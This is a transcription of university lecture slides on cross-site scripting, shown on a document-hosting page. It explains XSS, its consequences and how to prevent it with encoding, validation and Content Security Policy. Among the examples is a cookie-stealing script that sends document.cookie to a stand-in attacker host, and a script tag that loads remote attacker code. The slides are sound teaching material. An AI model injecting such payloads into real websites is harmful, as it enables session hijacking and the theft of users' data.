CSCE 813 Internet Security Case Study II: XSS

Similar documents
CIS 4360 Secure Computer Systems XSS

Web Application Security. Philippe Bogaerts

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Web Application Security

Application vulnerabilities and defences

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

WEB SECURITY: XSS & CSRF

Web basics: HTTP cookies

Client Side Injection on Web Applications

7.2.4 on Media content; on XSS) sws2 1

CSCE 548 Building Secure Software SQL Injection Attack

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

C1: Define Security Requirements

Web Security: XSS; Sessions

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

CSCD 303 Essential Computer Security Fall 2017

The security of Mozilla Firefox s Extensions. Kristjan Krips


Common Websites Security Issues. Ziv Perry

Combating Common Web App Authentication Threats

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

CSC 405 Computer Security. Web Security

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Content Security Policy

Web Security: Vulnerabilities & Attacks

Chrome Extension Security Architecture

CS 155 Project 2. Overview & Part A

P2_L12 Web Security Page 1

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Robust Defenses for Cross-Site Request Forgery Review

Web Security II. Slides from M. Hicks, University of Maryland

Detecting XSS Based Web Application Vulnerabilities

NET 311 INFORMATION SECURITY

Prevention Of Cross-Site Scripting Attacks (XSS) On Web Applications In The Client Side

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

CSCD 303 Essential Computer Security Fall 2018

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Security Course. WebGoat Lab sessions

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Copyright

CS 161 Computer Security

Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)

OWASP TOP 10. By: Ilia

CS 161 Computer Security

Advanced Web Technology 10) XSS, CSRF and SQL Injection

ESORICS September Martin Johns

Security issues. Unit 27 Web Server Scripting Extended Diploma in ICT 2016 Lecture: Phil Smith

RKN 2015 Application Layer Short Summary

PHP Security. Kevin Schroeder Zend Technologies. Copyright 2007, Zend Technologies Inc.

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

last time: command injection

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

CS 161 Computer Security

John Coggeshall Copyright 2006, Zend Technologies Inc.

Web Security, Part 2

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

XSS Homework. 1 Overview. 2 Lab Environment

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Web Security. Attacks on Servers 11/6/2017 1

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

Aguascalientes Local Chapter. Kickoff

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

XSSFor the win! What can be really done with Cross-Site Scripting.

COMP9321 Web Application Engineering

SPOOFING. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

Configuring User Defined Patterns

CSE 127 Computer Security

Finding Vulnerabilities in Web Applications

Web Security, Summer Term 2012

Web Security, Summer Term 2012

Security Engineering by Ross Andersson Chapter 18. API Security. Presented by: Uri Ariel Nepomniashchy 31/05/2016

Integrity attacks (from data to code): Cross-site Scripting - XSS

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Presented By Rick Deacon DEFCON 15 August 3-5, 2007

Overtaking Google Desktop Leveraging XSS to Raise Havoc. 6 th OWASP AppSec Conference. The OWASP Foundation

Solution of Exercise Sheet 5

Exploiting and Defending: Common Web Application Vulnerabilities

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

WebGoat Lab session overview

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 3 Protecting Systems

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Web Attacks Lab. 35 Points Group Lab Due Date: Lesson 16

Your Turn to Hack the OWASP Top 10!

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Attacks on Clients: JavaScript & XSS

Transcription:

CSCE 813 Internet Security Case Study II: XSS Professor Lisa Luo Fall 2017

Outline Cross-site Scripting (XSS) Attacks Prevention 2

What is XSS? Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser. The vulnerable website has acted as an unintentional accomplice to the attacker The attacker does not directly attack the victim Instead, he exploits a vulnerability in a website that the victim visits, in order to get the website to deliver the malicious JavaScript to the victim 3

Wants to attack the victim 4

How to Inject Malicious JavaScript? E.g., an attacker leaves comment in a forum website But the comment actually some JavaScript, e.g., <script> </script> A victim browser loads the webpage containing the comment It will execute whatever JavaScript code inside the <script> tags Vulnerable website: print "<html>" print "Latest comment:" print database.latestcomment print "</html>" Victim: <html> Latest comment: <script>...</script> </html> 5

Consequences of Malicious JavaScript Because the attacker has injected code into a page served by the website, the malicious JavaScript is executed in the context of the downloaded webpages from the vulnerable website This means that it is treated like any other script from that website: it has access to the victim's data for that website (such as cookies) 6

Consequences of Malicious JavaScript Cookie theft The attacker can access the victim's cookies associated with the website using document.cookie, send them to his own server, and use them to extract sensitive information like session IDs <script> window.location= http://attacker/?cookie= +document.cookie </script> Keylogging The attacker can register a keyboard event listener using addeventlistener and then send all of the user's keystrokes to his own server, potentially recording sensitive info such as passwords and credit card numbers Phishing The attacker can insert a fake login form and then trick the user into submitting sensitive information 7

Steps in a Classic XSS Attack Instance Actors: the website, the victim, the attacker The website serves HTML pages to users who request them, e.g., http://website/ The victim is a normal user of the website who requests pages from it using his browser The attacker is a malicious user of the website who intends to launch an attack on the victim by exploiting an XSS vulnerability in the website 8

Steps in a Classic XSS Attack Instance 1. The attacker uses the website's forms to insert a malicious string into the website's database 2. The victim requests a page from the website 3. The website includes the malicious string in the response and sends it to the victim 4. The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's server 9

Steps in a Classic XSS Attack Instance 10

XSS Prevention

Preventing XSS XSS is essentially due to careless handling of user input (e.g., the comment and weird url) Secure input handling XSS frequently relies on external website s JavaScript code Content Security Policy (CSP): defines trusted sources <html> Latest comment: <script src="http://attacker/malicious-script.js"></script> </html> 12

Preventing XSS Encoding, which escapes the user input so that the browser interprets it as data, not as code print userinput => print encodehtml(userinput) <script> </script> => <script>...</script> There are mature libraries you can use: e.g., OWASP s Encoder Project Validation, which filters the user input so that all malicious parts of it are removed E.g., allowing some HTML elements (such as <em> and <strong>) but disallowing others (such as <script>) 13

Summary What is XSS? How to insert malicious JavaScript? Steps in a Classic XSS attack instance Consequences of malicious JavaScript Preventing XSS: Input handling: encoding and validation Content Security Policy 14

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback